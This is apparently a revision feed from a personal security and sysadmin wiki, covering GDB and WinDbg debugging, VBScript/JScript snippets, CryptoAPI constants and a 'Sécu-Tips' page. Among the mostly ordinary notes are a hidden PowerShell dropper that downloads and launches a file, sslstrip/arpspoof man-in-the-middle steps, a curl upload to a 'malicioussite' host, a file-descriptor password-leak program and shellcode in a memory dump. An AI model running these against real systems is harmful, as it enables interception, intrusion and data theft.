UnixWiki - Contributions [fr]

VBScript

2019-02-15T11:10:31Z

Futex :

Print text
Wscript.echo("text")

Write in a text file
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile=CreateObject("WScript.Shell").SpecialFolders("Desktop") + "\stage1.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.WriteLine variable

Append in a text file
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile=CreateObject("WScript.Shell").SpecialFolders("Desktop") + "\stage2.txt"
Set objFile = objFSO.OpenTextFile(outFile, 8, True)
objFile.WriteLine variable

If you can't see all the variable value with the watch point, you can open immediate window View--> Intermediate Window or CTRL-G and type
<code>
debug.print VARIABLE_NAME
</code>

Copy variable into the clipboard
Set objIE = CreateObject("InternetExplorer.Application")
objIE.Visible = False
objIE.Navigate("about:blank")
objIE.document.parentwindow.clipboardData.SetData "text", host
objIE.Quit

Introduction à GDB

2018-11-19T13:15:35Z

Futex :

== Bases ==
$ gdb $prog // Chargement d'un binaire:
(gdb) r 123 // Lancement du programme avec comme paramètre 123
(gdb) s ou stepi // Avancer à la prochaine instruction, en entrant dans les fonctions
(gdb) n ou nexti // Avancer à la prochaine instruction sans entrer dans les fonctions
(gdb) c // Continue l'exécution après un breackpoint par exemple
(gdb) disass function_foo // Désassemble la fonction function_foo
(gdb) disass // Désassemble tous
(gdb) q // Quitter

== Les breackpoints ==
(gdb) b // Pose un breackpoint sur la ligne courante.
(gdb) b main // Pose un breackpoint sur la fonction main
(gdb) b *0xdeadbeef // Pose un breackpoint sur l'adresse mémoire 0xdeadbeef
(gdb) hb *0xdeadbeef // Pose un hardware breackpoint
(gdb) i b // liste tout type de breackpoints

== Les registres CPU ==
(gdb) i f // Renvois l'état de la sauvegarde des registre EBP, EIP et leurs adresses en mémoire
(gdb) i r // Renvoi l'état des registres
(gdb) info all-registers // Affiche tous les registres
(gdb) print $eax // Affiche le contenu du registre eax
(gdb) set $eax=128 // Force le registre eax à 128

== La mémoire ==

(gdb) x/500x 0x41414141 // Dump de la mémoire à partir de l'adresse 0x41414141
(gdb) x/26x 0xbffff8c2 // Dump de 26*4 octets à partir de l'adresse 0xbffff8c2
0xbffff8c2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8e2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8f2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff902: 0x90909090 0x90909090 0xc0319990 0x2f6e6852
0xbffff912: 0x2f686873 0x8969622f 0x895352e3 0xcd0bb0e1
0xbffff922: 0xfff8c280 0x535300bf
gdb) x/500x $esp // Dump de la mémoire à partir de la position pointé par ESP, c'est à dire en haut de la stack
gdb) vmmap // affiche les segments mémoire du progz
gdb) dumpmem out 0x41414141 // dump de la mémoire

== Les process ==
(gdb) attach 4009 // Attacher un PID (4009)
(gdb) info proc // Informations sur le process
(gdb) info func // Informations sur les fonctions
(gdb)set follow-fork-mode child // pour suivre le processus fils au moment du fork

== Tips ==
Passer le zeroflag à zéro
(gdb) set $eflags = $eflags | 64

Afficher les flags
(gdb)info registers eflags

Modifier l'affichage de l'ASM

set disassembly-flavor intel
ou
set disassembly-flavor att

"piper" une commande dans gdb
r <<< $(python -c 'print "A"*280 + "BBBB"')

Passer les signaux SIGTRAP au programme
handle SIGTRAP pass nostop

Restaurer l'execution
signal SIGTRAP

Passer les signaux SIGTRAP a GDB
handle SIGTRAP nopass stop

== Remote debugging ==

Sur la machine distante

gdbserver :5039 binary

Si necessaire forwarder le port sur la machine local
adb forward tcp:5039 tcp:5039

lancer gdb
gdb binary
ou
gdb-multiarch -q -nx binary

taper:
gdb$ target remote :5039

== How to Peda ==
[https://eugenekolo.com/blog/better-disassembly-with-gdb-peda/ Peda]

Introduction à GDB

2018-11-19T13:14:08Z

Futex : /* How to Peda */

== Bases ==
$ gdb $prog // Chargement d'un binaire:
(gdb) r 123 // Lancement du programme avec comme paramètre 123
(gdb) s ou stepi // Avancer à la prochaine instruction, en entrant dans les fonctions
(gdb) n ou nexti // Avancer à la prochaine instruction sans entrer dans les fonctions
(gdb) c // Continue l'exécution après un breackpoint par exemple
(gdb) disass function_foo // Désassemble la fonction function_foo
(gdb) disass // Désassemble tous
(gdb) q // Quitter

== Les breackpoints ==
(gdb) b // Pose un breackpoint sur la ligne courante.
(gdb) b main // Pose un breackpoint sur la fonction main
(gdb) b *0xdeadbeef // Pose un breackpoint sur l'adresse mémoire 0xdeadbeef
(gdb) hb *0xdeadbeef // Pose un hardware breackpoint
(gdb) i b // liste tout type de breackpoints

== Les registres CPU ==
(gdb) i f // Renvois l'état de la sauvegarde des registre EBP, EIP et leurs adresses en mémoire
(gdb) i r // Renvoi l'état des registres
(gdb) info all-registers // Affiche tous les registres
(gdb) print $eax // Affiche le contenu du registre eax
(gdb) set $eax=128 // Force le registre eax à 128

== La mémoire ==

(gdb) x/500x 0x41414141 // Dump de la mémoire à partir de l'adresse 0x41414141
(gdb) x/26x 0xbffff8c2 // Dump de 26*4 octets à partir de l'adresse 0xbffff8c2
0xbffff8c2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8e2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8f2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff902: 0x90909090 0x90909090 0xc0319990 0x2f6e6852
0xbffff912: 0x2f686873 0x8969622f 0x895352e3 0xcd0bb0e1
0xbffff922: 0xfff8c280 0x535300bf
gdb) x/500x $esp // Dump de la mémoire à partir de la position pointé par ESP, c'est à dire en haut de la stack
gdb) vmmap // affiche les segments mémoire du progz
gdb) dumpmem out 0x41414141 // dump de la mémoire

== Les process ==
(gdb) attach 4009 // Attacher un PID (4009)
(gdb) info proc // Informations sur le process
(gdb) info func // Informations sur les fonctions
(gdb)set follow-fork-mode child // pour suivre le processus fils au moment du fork

== Tips ==
Passer le zeroflag à zéro
(gdb) set $eflags = $eflags | 64

Afficher les flags
(gdb)info registers eflags

Modifier l'affichage de l'ASM

set disassembly-flavor intel
ou
set disassembly-flavor att

"piper" une commande dans gdb
r <<< $(python -c 'print "A"*280 + "BBBB"')

Passer les signaux SIGTRAP au programme
handle SIGTRAP pass nostop

Restaurer l'execution
signal SIGTRAP

Passer les signaux SIGTRAP a GDB
handle SIGTRAP nopass stop

== Remote debugging ==

Sur la machine distante

gdbserver :5039 binary

Si necessaire forwarder le port sur la machine local
adb forward tcp:5039 tcp:5039

lancer gdb
gdb binary
ou
gdb-multiarch -q -nx binary

taper:
gdb$ target remote :5039

== How to Peda ==
[[Peda https://eugenekolo.com/blog/better-disassembly-with-gdb-peda/]]

Introduction à GDB

2018-11-19T13:13:48Z

Futex :

== Bases ==
$ gdb $prog // Chargement d'un binaire:
(gdb) r 123 // Lancement du programme avec comme paramètre 123
(gdb) s ou stepi // Avancer à la prochaine instruction, en entrant dans les fonctions
(gdb) n ou nexti // Avancer à la prochaine instruction sans entrer dans les fonctions
(gdb) c // Continue l'exécution après un breackpoint par exemple
(gdb) disass function_foo // Désassemble la fonction function_foo
(gdb) disass // Désassemble tous
(gdb) q // Quitter

== Les breackpoints ==
(gdb) b // Pose un breackpoint sur la ligne courante.
(gdb) b main // Pose un breackpoint sur la fonction main
(gdb) b *0xdeadbeef // Pose un breackpoint sur l'adresse mémoire 0xdeadbeef
(gdb) hb *0xdeadbeef // Pose un hardware breackpoint
(gdb) i b // liste tout type de breackpoints

== Les registres CPU ==
(gdb) i f // Renvois l'état de la sauvegarde des registre EBP, EIP et leurs adresses en mémoire
(gdb) i r // Renvoi l'état des registres
(gdb) info all-registers // Affiche tous les registres
(gdb) print $eax // Affiche le contenu du registre eax
(gdb) set $eax=128 // Force le registre eax à 128

== La mémoire ==

(gdb) x/500x 0x41414141 // Dump de la mémoire à partir de l'adresse 0x41414141
(gdb) x/26x 0xbffff8c2 // Dump de 26*4 octets à partir de l'adresse 0xbffff8c2
0xbffff8c2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8d2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8e2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff8f2: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffff902: 0x90909090 0x90909090 0xc0319990 0x2f6e6852
0xbffff912: 0x2f686873 0x8969622f 0x895352e3 0xcd0bb0e1
0xbffff922: 0xfff8c280 0x535300bf
gdb) x/500x $esp // Dump de la mémoire à partir de la position pointé par ESP, c'est à dire en haut de la stack
gdb) vmmap // affiche les segments mémoire du progz
gdb) dumpmem out 0x41414141 // dump de la mémoire

== Les process ==
(gdb) attach 4009 // Attacher un PID (4009)
(gdb) info proc // Informations sur le process
(gdb) info func // Informations sur les fonctions
(gdb)set follow-fork-mode child // pour suivre le processus fils au moment du fork

== Tips ==
Passer le zeroflag à zéro
(gdb) set $eflags = $eflags | 64

Afficher les flags
(gdb)info registers eflags

Modifier l'affichage de l'ASM

set disassembly-flavor intel
ou
set disassembly-flavor att

"piper" une commande dans gdb
r <<< $(python -c 'print "A"*280 + "BBBB"')

Passer les signaux SIGTRAP au programme
handle SIGTRAP pass nostop

Restaurer l'execution
signal SIGTRAP

Passer les signaux SIGTRAP a GDB
handle SIGTRAP nopass stop

== Remote debugging ==

Sur la machine distante

gdbserver :5039 binary

Si necessaire forwarder le port sur la machine local
adb forward tcp:5039 tcp:5039

lancer gdb
gdb binary
ou
gdb-multiarch -q -nx binary

taper:
gdb$ target remote :5039

== How to Peda ==
[[https://eugenekolo.com/blog/better-disassembly-with-gdb-peda/]]

Introduction à GDB

2018-11-19T13:12:12Z

Futex :

Kernel Debug

2018-10-10T12:49:54Z

Futex : /* Kernel Debug on a WinXP machine */

== Kernel Debug on a WinXP machine ==
In the debugger machine create a host pipe (don't check auto connect to pipe, virtualbox will automatically create the pipe in /tmp/dbg)
[[Fichier:Debugger.png]]

In the debuggee machine set the host pipe path, and check the host pipe autoconnect)

[[Fichier:Debuggee.png]]

Add these line in c:\boot.init of the debugee machine

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINXP
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINXP="Microsoft Windows XP Professional" /noexecute=optin /fastdetect /debugport=COM1 /baudrate=115200

On the debugger machine, launch Windbg in admin press ctrl + k or File -> kernel debug, dont check pipe and reconnect option or it will failed

[[Fichier:Windbg.png]]

Now start the debuggee VM, it should be run.

Kernel Debug

2018-10-10T12:49:32Z

Futex : Page créée avec « == Kernel Debug on a WinXP machine == In the debugger machine create a host pipe (don't check auto connect to pipe, virtualbox will automatically create the pipe in /tmp/d... »

== Kernel Debug on a WinXP machine ==
In the debugger machine create a host pipe (don't check auto connect to pipe, virtualbox will automatically create the pipe in /tmp/dbg)
[[Fichier:Debugger.png]]

In the debuggee machine set the host pipe path, and check the host pipe autoconnect)
[[Fichier:Debuggee.png]]

Add these line in c:\boot.init of the debugee machine

[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\WINXP
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\WINXP="Microsoft Windows XP Professional" /noexecute=optin /fastdetect /debugport=COM1 /baudrate=115200

On the debugger machine, launch Windbg in admin press ctrl + k or File -> kernel debug, dont check pipe and reconnect option or it will failed

[[Fichier:Windbg.png]]

Now start the debuggee VM, it should be run.

Fichier:Windbg.png

2018-10-10T12:48:32Z

Futex :

Fichier:Debugger.png

2018-10-10T12:43:48Z

Futex :

Fichier:Debuggee.png

2018-10-10T12:43:10Z

Futex :

Reverse

2018-10-10T12:41:16Z

Futex :

[[Memory Analys]] 
[[gdb]] 
[[Ollydbg]] 
[[Windbg]] 
[[x64dbg]] 
[[Introduction au reverse]] 
[[Introduction à GDB]] 
[[Introduction à Radare]] 
[[Windows Messages]] 
[[Reverse Android]] 
[[Reverse Dotnet]] 
[[Kernel Debug]]

Windbg

2018-10-05T09:26:26Z

Futex :

[http://windbg.info/doc/1-common-cmds.html Windbg] commands

[[Load sos.dll]] 

== Remote Kernel debug ==

On debugged machine type:
bcdedit.exe -dbgsettings net hostip:xxx.xxx.xxx.xxx port:1234

Don't forget, to remove the unsigned driver protection
bcdedit.exe -set testsigning on

Boot the debugged machine in debug mode
bcdedit.exe -set debug on

JScript

2018-09-05T19:56:12Z

Futex :

Print text
WScript.echo("text")

Write to a file:

var fso = new ActiveXObject("Scripting.FileSystemObject");
var fh = fso.CreateTextFile("C:\\Users\\admin\\Desktop\\Results.txt", true, true);
fh.WriteLine("Hello World")

1.2 Forensic tips

2018-05-07T13:00:37Z

Futex :

SMS MMS file:
/data/data/com.android.providers/telephony/databases/mmssms.db
ou plus récemment
/data/data/com.android.providers.telephony/databases/mmssms.db

Copy file
adb push myfile /data/local/tmp

1.2 Forensic tips

2018-05-07T11:28:09Z

Futex : /

SMS MMS file:
/data/data/com.android.providers/telephony/databases/mmssms.db
ou plus récemment
/data/data/com.android.providers.telephony/databases/mmssms.db

Android

2018-05-07T11:17:09Z

Futex :

== Administration courante ==
[[1.1 Monter la carte SD sous Linux]] 
[[1.2 Forensic tips]]

Sécu-Tips

2018-04-30T14:28:26Z

Futex : /* Envoyer du raw binaire à un site web */

== Connaître la version de Bind à distance ==

# nslookup -q=txt -class=CHAOS version.bind 213.186.33.99
ou
# fpdns -D 213.186.33.99

== Décoder une chaîne en base64 ==

#perl -MMIME::Base64 -le 'print decode_base64 ("c2VjcmV00k1BbUdvZa---")'
secret:IamGod

----

== MITM Attack avec sslstrip ==

Activer le mode forwarding.
echo "1" > /proc/sys/net/ipv4/ip_forward
Rediriger le traffic HTTP sur sslstrip avec iptables.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Lancer sslstrip sslstrip.
sslstrip.py -l <listenPort>

Lancer arpspoof pour se faire passer pour la gateway
arpspoof -i <interface> -t <targetIP> <gatewayIP>

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

----

== Recherche du bit setuid ==

SunOS
find / -local -type f $ -perm -4000 -o -perm -2000 $ -print
AIX
find / -type f $ -perm -4000 -o -perm -2000 $ -print
Linux
find / -local -type f $ -perm -4000 -o -perm -2000 $ -print
HP-UX
find / -local -type f $ -perm -4000 -o -perm -2000 $ -prin

== Unix Hack==

Files descriptors leaks

#include <stdlib.h>
#include <stdio.h>
#define FD 3
#define VSIZE 256
int main()
{
int index; char buffer[VSIZE];
char cmd[VSIZE];
sprintf(cmd, "ls -la /proc/%d/fd/3", getpid()+2);
system(cmd);
lseek(FD, 0, SEEK_SET);
while((index = read(FD,buffer,VSIZE-1)) != 0 && index > 0)
{
buffer[index-1] = '\0';
fprintf(stdout,"[+] Password : %s\n", buffer);
return EXIT_SUCCESS;
}
fprintf(stderr,"[-] Password not found\n");
return EXIT_FAILURE;
}

== Envoyer du raw binaire à un site web ==
curl --request POST --data-binary "@data.bin" hxxp://malicioussite.com/loveyoupolice182938481.php -o answer.bin

Sécu-Tips

2018-04-30T14:28:07Z

Futex :

== Connaître la version de Bind à distance ==

# nslookup -q=txt -class=CHAOS version.bind 213.186.33.99
ou
# fpdns -D 213.186.33.99

== Décoder une chaîne en base64 ==

#perl -MMIME::Base64 -le 'print decode_base64 ("c2VjcmV00k1BbUdvZa---")'
secret:IamGod

----

== MITM Attack avec sslstrip ==

Activer le mode forwarding.
echo "1" > /proc/sys/net/ipv4/ip_forward
Rediriger le traffic HTTP sur sslstrip avec iptables.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
Lancer sslstrip sslstrip.
sslstrip.py -l <listenPort>

Lancer arpspoof pour se faire passer pour la gateway
arpspoof -i <interface> -t <targetIP> <gatewayIP>

How does this work?

First, arpspoof convinces a host that our MAC address is the router’s MAC address, and the target begins to send us all its network traffic. The kernel forwards everything along except for traffic destined to port 80, which it redirects to $listenPort (10000, for example).

At this point, sslstrip receives the traffic and does its magic.

----

== Recherche du bit setuid ==

SunOS
find / -local -type f $ -perm -4000 -o -perm -2000 $ -print
AIX
find / -type f $ -perm -4000 -o -perm -2000 $ -print
Linux
find / -local -type f $ -perm -4000 -o -perm -2000 $ -print
HP-UX
find / -local -type f $ -perm -4000 -o -perm -2000 $ -prin

== Unix Hack==

Files descriptors leaks

#include <stdlib.h>
#include <stdio.h>
#define FD 3
#define VSIZE 256
int main()
{
int index; char buffer[VSIZE];
char cmd[VSIZE];
sprintf(cmd, "ls -la /proc/%d/fd/3", getpid()+2);
system(cmd);
lseek(FD, 0, SEEK_SET);
while((index = read(FD,buffer,VSIZE-1)) != 0 && index > 0)
{
buffer[index-1] = '\0';
fprintf(stdout,"[+] Password : %s\n", buffer);
return EXIT_SUCCESS;
}
fprintf(stderr,"[-] Password not found\n");
return EXIT_FAILURE;
}

== Envoyer du raw binaire à un site web ==
curl --request POST --data-binary "@data.bin" http://malicioussite.com/loveyoupolice182938481.php -o answer.bin

Admin

2018-04-26T11:39:08Z

Futex : Page créée avec « Add a second IP address in command line netsh interface ipv4 add address “Local Area Connection” 192.168.1.2 255.255.255.0 »

Add a second IP address in command line
netsh interface ipv4 add address “Local Area Connection” 192.168.1.2 255.255.255.0

Windows 10

2018-04-26T11:38:38Z

Futex :

[[Admin]] 
[[CryptoAPI]]

Windows 10

2018-04-26T11:38:29Z

Futex :

[[Admin]]
[[CryptoAPI]]

VBScript

2018-04-10T08:55:56Z

Futex :

Print text
Wscript.echo("text")

Write in a text file
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile=CreateObject("WScript.Shell").SpecialFolders("Desktop") + "\stage1.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.WriteLine variable

If you can't see all the variable value with the watch point, you can open immediate window View--> Intermediate Window or CTRL-G and type
<code>
debug.print VARIABLE_NAME
</code>

Copy variable into the clipboard
Set objIE = CreateObject("InternetExplorer.Application")
objIE.Visible = False
objIE.Navigate("about:blank")
objIE.document.parentwindow.clipboardData.SetData "text", host
objIE.Quit

VBScript

2018-03-01T11:44:32Z

Futex :

PowerShell

2018-02-21T10:18:15Z

Futex :

Simple dropper

powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Temp\image.png'); Start-Process('C:\Users\admin\AppData\Local\Temp\image.png')

Find the framework version of a binary
[Reflection.Assembly]::ReflectionOnlyLoadFrom("C:\Users\futex\Desktop\test.exe").ImageRuntimeVersion
v2.0.50727

Find machine version using Active Directory
Get-ADComputer "$MACHINE_NAME" -Property operatingsystemversion

VBScript

2018-02-05T11:57:30Z

Futex :

JScript

2018-02-05T10:03:50Z

Futex :

Print text
WScript.echo("text")

Write to a file:

var fso = new ActiveXObject("Scripting.FileSystemObject");
var fh = fso.CreateTextFile("C:\Users\admin\Desktop\Results.txt", true, true);
fh.WriteLine("Hello World")

JScript

2018-02-05T10:03:37Z

Futex : Page créée avec « Print text WScript.echo("text") Write to a file: var fso = new ActiveXObject("Scripting.FileSystemObject"); var fh = fso.CreateTextFile("C:\Users\admin\Desktop\... »

Accueil

2018-02-05T10:01:30Z

Futex : /* Programmation */

== Unix ==
:[[AIX]] - [[Solaris]] - [[Linux]] - [[HP-UX]] - [[Android]] - [[MacOS/iOS]] - [[Unix bases]]

== Windows ==
:[[Windows XP]] - [[Windows Vista]] - [[ Windows Seven]] - [[ Windows 10 ]]

== Programmation ==
:[[C]] - [[C++]] - [[C Sharp]] - [[Java]] - [[Shell]] - [[Perl]] - [[Python]] - [[Ruby]] - [[PowerShell]] - [[PHP]] - [[HTML]] - [[JavaScript]] - [[SQL]] - [[Assembleur]] - [[GCC]] - [[VBScript]] - [[JScript]]

== Stockage ==
:[[Switchs SAN]] - [[Baies DS8000]] - [[Baies EMC]] - [[SVC]] - [[NetApp]]

==Software==
:[[Apache]] [[MySQL]] [[SQLite]]

== Sécurité ==
:[[Web]] - [[BOF]] - [[Reverse]] - [[Botnets]] - [[Network]] - [[Fingerprint]] - [[Crack Pass]] - [[SSH]] - [[Nmap]] - [[ Scapy]] - [[Metasploit]] - [[Nessus]] - [[Outils divers]] - [[Sécu-Tips]]

== Divers ==
:[[Mémo VI]] - [[Mémo MediaWiki]] - [[Mémo Firefox]] - [[Mémo Chrome/Chromium]] - [[Beer]]

== Liens externes ==

:[[Hacking et sécurité]] - [[Développement]]

Load sos.dll

2017-10-31T14:43:31Z

Futex :

In case of the analysed binary is older than the framework 4:
sxe ld mscorwks.dll; g
.loadby sos mscorwks (After windbg breaks)

If framework >= 4
sxe ld clrjit ; g
.loadby sos clr (After windbg breaks)

Load sos.dll

2017-10-31T14:43:17Z

Futex : Page créée avec « In case of the analysed binary is older than the framework 4: sxe ld mscorwks.dll; g .loadby sos mscorwks (After windbg breaks) If > framework 4 sxe ld clrjit ; g... »

In case of the analysed binary is older than the framework 4:
sxe ld mscorwks.dll; g
.loadby sos mscorwks (After windbg breaks)

If > framework 4
sxe ld clrjit ; g
.loadby sos clr (After windbg breaks)

Windbg

2017-10-31T14:41:31Z

Futex :

[http://windbg.info/doc/1-common-cmds.html Windbg] commands

[[Load sos.dll]]

PowerShell

2017-10-31T14:40:13Z

Futex :

VBScript

2017-08-21T13:44:48Z

Futex :

Print text
Wscript.echo("text")

Write in a text file
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="C:\Users\User\Desktop\Results.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.WriteLine variable

If you can't see all the variable value with the watch point, you can open immediate window View--> Intermediate Window or CTRL-G and type
<code>
debug.print VARIABLE_NAME
</code>

1.3 Afficher du texte

2017-08-18T11:35:58Z

Futex : Page créée avec « Dans une messageBox <code> WScript.Echo("Hello World"); </code> »

Dans une messageBox

<code>
WScript.Echo("Hello World");
</code>

JavaScript

2017-08-18T11:35:28Z

Futex :

[[1.1 Executer du JS depuis run32dll]] 
[[1.2 Executer un DLL depuis du JS ]] 
[[1.3 Afficher du texte ]]

CryptoAPI

2017-05-23T11:38:21Z

Futex :

CryptAcquireContext

dwProvType hex value:

PROV_RSA_FULL 0X1
PROV_RSA_AES 0x18
PROV_RSA_SIG 0x2
PROV_RSA_SCHANNEL 0xC
PROV_DSS 0x3
PROV_DSS_DH 0xD
PROV_DH_SCHANNEL 0x12
PROV_FORTEZZA 0x4
PROV_MS_EXCHANGE 0x5
PROV_SSL 0x6

dwFlags
CRYPT_VERIFYCONTEXT 0xF0000000
CRYPT_NEWKEYSET 0x8
CRYPT_MACHINE_KEYSET 0x20
CRYPT_DELETEKEYSET 0x10
CRYPT_SILENT 0X40
CRYPT_DEFAULT_CONTAINER_OPTIONAL 0X80

CryptGenKey

ALG_ID values:

CALG_3DES 0x00006603
CALG_3DES_112 0x00006609
CALG_AES 0x00006611
CALG_AES_128 0x0000660e
CALG_AES_192 0x0000660f
CALG_AES_256 0x00006610
CALG_AGREEDKEY_ANY 0x0000aa03
CALG_CYLINK_MEK 0x0000660c
CALG_DES 0x00006601
CALG_DESX 0x00006604
CALG_DH_EPHEM 0x0000aa02
CALG_DH_SF 0x0000aa01
CALG_DSS_SIGN 0x00002200
CALG_ECDH 0x0000aa05
CALG_ECDH_EPHEM 0x0000ae06
CALG_ECDSA 0x00002203
CALG_ECMQV 0x0000a001
CALG_HASH_REPLACE_OWF 0x0000800b
CALG_HUGHES_MD5 0x0000a003
CALG_HMAC 0x00008009
CALG_KEA_KEYX 0x0000aa04
CALG_MAC 0x00008005
CALG_MD2 0x00008001
CALG_MD4 0x00008002
CALG_MD5 0x00008003
CALG_NO_SIGN 0x00002000
CALG_OID_INFO_CNG_ONLY 0xffffffff
CALG_OID_INFO_PARAMETERS 0xfffffffe
CALG_PCT1_MASTER 0x00004c04
CALG_RC2 0x00006602
CALG_RC4 0x00006801
CALG_RC5 0x0000660d
CALG_RSA_KEYX 0x0000a400
CALG_RSA_SIGN 0x00002400
CALG_SCHANNEL_ENC_KEY 0x00004c07
CALG_SCHANNEL_MAC_KEY 0x00004c03
CALG_SCHANNEL_MASTER_HASH 0x00004c02
CALG_SEAL 0x00006802
CALG_SHA 0x00008004
CALG_SHA1 0x00008004
CALG_SHA_256 0x0000800c
CALG_SHA_384 0x0000800d
CALG_SHA_512 0x0000800e
CALG_SKIPJACK 0x0000660a
CALG_SSL2_MASTER 0x00004c05
CALG_SSL3_MASTER 0x00004c01
CALG_SSL3_SHAMD5 0x00008008
CALG_TEK 0x0000660b
CALG_TLS1_MASTER 0x00004c06
CALG_TLS1PRF 0x0000800a

CryptoAPI

2017-05-23T11:22:47Z

Futex :

CryptoAPI

2017-05-23T10:11:56Z

Futex :

CryptAcquireContext dwProvType hex value:

PROV_RSA_FULL
PROV_RSA_AES 0x18
PROV_RSA_SIG
PROV_RSA_SCHANNEL
PROV_DSS
PROV_DSS_DH
PROV_DH_SCHANNEL
PROV_FORTEZZA
PROV_MS_EXCHANGE
PROV_SSL

dwFlags
CRYPT_VERIFYCONTEXT 0x0FFFFFFF0
CRYPT_NEWKEYSET
CRYPT_MACHINE_KEYSET
CRYPT_DELETEKEYSET
CRYPT_SILENT
CRYPT_DEFAULT_CONTAINER_OPTIONAL

CryptoAPI

2017-05-23T10:07:44Z

Futex : Page créée avec « CryptAcquireContext dwProvType hex value: PROV_RSA_FULL PROV_RSA_AES 0x18 PROV_RSA_SIG PROV_RSA_SCHANNEL PROV_DSS PROV_DSS_DH PROV_DH_SCHANNEL... »

CryptAcquireContext dwProvType hex value:

PROV_RSA_FULL
PROV_RSA_AES 0x18
PROV_RSA_SIG
PROV_RSA_SCHANNEL
PROV_DSS
PROV_DSS_DH
PROV_DH_SCHANNEL
PROV_FORTEZZA
PROV_MS_EXCHANGE
PROV_SSL

Windows 10

2017-05-23T10:06:29Z

Futex : Page créée avec « CryptoAPI »

[[CryptoAPI]]

VBScript

2017-05-18T14:05:05Z

Futex :

VBScript

2017-05-18T14:04:55Z

Futex : Page créée avec « Print text wscript.echo("text") Write in a text file Set objFSO=CreateObject("Scripting.FileSystemObject") outFile="C:\Users\User\Desktop\Results.txt" Set obj... »

Print text
wscript.echo("text")

Write in a text file
Set objFSO=CreateObject("Scripting.FileSystemObject")
outFile="C:\Users\User\Desktop\Results.txt"
Set objFile = objFSO.CreateTextFile(outFile,True)
objFile.WriteLine variable

Accueil

2017-05-18T14:02:41Z

Futex : /* Programmation */

== Unix ==
:[[AIX]] - [[Solaris]] - [[Linux]] - [[HP-UX]] - [[Android]] - [[MacOS/iOS]] - [[Unix bases]]

== Windows ==
:[[Windows XP]] - [[Windows Vista]] - [[ Windows Seven]] - [[ Windows 10 ]]

== Programmation ==
:[[C]] - [[C++]] - [[C Sharp]] - [[Java]] - [[Shell]] - [[Perl]] - [[Python]] - [[Ruby]] - [[PowerShell]] - [[PHP]] - [[HTML]] - [[JavaScript]] - [[SQL]] - [[Assembleur]] - [[GCC]] - [[VBScript]]

== Stockage ==
:[[Switchs SAN]] - [[Baies DS8000]] - [[Baies EMC]] - [[SVC]] - [[NetApp]]

==Software==
:[[Apache]] [[MySQL]] [[SQLite]]

== Sécurité ==
:[[Web]] - [[BOF]] - [[Reverse]] - [[Botnets]] - [[Network]] - [[Fingerprint]] - [[Crack Pass]] - [[SSH]] - [[Nmap]] - [[ Scapy]] - [[Metasploit]] - [[Nessus]] - [[Outils divers]] - [[Sécu-Tips]]

== Divers ==
:[[Mémo VI]] - [[Mémo MediaWiki]] - [[Mémo Firefox]] - [[Mémo Chrome/Chromium]] - [[Beer]]

== Liens externes ==

:[[Hacking et sécurité]] - [[Développement]]

Accueil

2017-05-18T14:02:31Z

Futex : /* Programmation */

== Unix ==
:[[AIX]] - [[Solaris]] - [[Linux]] - [[HP-UX]] - [[Android]] - [[MacOS/iOS]] - [[Unix bases]]

== Windows ==
:[[Windows XP]] - [[Windows Vista]] - [[ Windows Seven]] - [[ Windows 10 ]]

== Programmation ==
:[[C]] - [[C++]] - [[C Sharp]] - [[Java]] - [[Shell]] - [[Perl]] - [[Python]] - [[Ruby]] - [[PowerShell]] - [[PHP]] - [[HTML]] - [[JavaScript]] - [[SQL]] - [[Assembleur]] - [[GCC]] - [[VBscript]]

== Stockage ==
:[[Switchs SAN]] - [[Baies DS8000]] - [[Baies EMC]] - [[SVC]] - [[NetApp]]

==Software==
:[[Apache]] [[MySQL]] [[SQLite]]

== Sécurité ==
:[[Web]] - [[BOF]] - [[Reverse]] - [[Botnets]] - [[Network]] - [[Fingerprint]] - [[Crack Pass]] - [[SSH]] - [[Nmap]] - [[ Scapy]] - [[Metasploit]] - [[Nessus]] - [[Outils divers]] - [[Sécu-Tips]]

== Divers ==
:[[Mémo VI]] - [[Mémo MediaWiki]] - [[Mémo Firefox]] - [[Mémo Chrome/Chromium]] - [[Beer]]

== Liens externes ==

:[[Hacking et sécurité]] - [[Développement]]

PowerShell

2016-12-07T15:50:23Z

Futex : Page créée avec « Simple dropper powershell.exe" -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('https://toto.com/image.png','C:\Users\admin\AppData\Local\Te... »

Accueil

2016-12-07T15:49:14Z

Futex : /* Programmation */

== Unix ==
:[[AIX]] - [[Solaris]] - [[Linux]] - [[HP-UX]] - [[Android]] - [[MacOS/iOS]] - [[Unix bases]]

== Windows ==
:[[Windows XP]] - [[Windows Vista]] - [[ Windows Seven]] - [[ Windows 10 ]]

== Programmation ==
